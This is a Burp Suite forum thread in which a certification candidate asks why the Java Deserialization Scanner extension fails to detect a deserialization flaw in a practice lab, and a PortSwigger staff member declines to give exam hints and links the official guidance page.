Burp Suite User Forum

Create new post

Practice Exam - Java Deserialization Scanner

Nadeau, | Last updated: Feb 28, 2023 02:41PM UTC

Hello everyone, I'm working on the practice exam for the Burp Suite certification. As many of you may know, the last stage involved an insecure java deserialization. Since there is no contextual clues as to what gadget chain the server might be vulnerable to, the advice I found online was to use the Burp extension "Java Deserialization Scanner". This tool can detect the specific Java deserialization vulnerabilities a server may have and is invaluable to completing this part of the exam. However, it seems this extension no longer works with Burp. It simply fails to detect any vulnerabilities. An issue was posted on the GitHub here: https://github.com/federicodotta/Java-Deserialization-Scanner/issues/31 I have run into the same issue. Even using an older version of Burp and Java, I have no success detecting the vulnerability with the scanner, even though I can exploit it using ysoserial (I am running tests against the "Exploiting Java deserialization with Apache Commons" lab). Does anyone have any idea how to either 1. get this thing working 2. an alternative tool to do the job 3. an alternative methodology to identify the correct deserialization vulnerability

Michelle, PortSwigger Agent | Last updated: Mar 01, 2023 02:10PM UTC

Hi We don't want to give away too many clues on the practice exam, as we want you to be able to use it as a realistic test before you take the exam. Although you can use additional extensions and tools, some of these may not be essential. We list the essential software on our Exam Hints and Guidance page: https://portswigger.net/web-security/certification/exam-hints-and-guidance

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.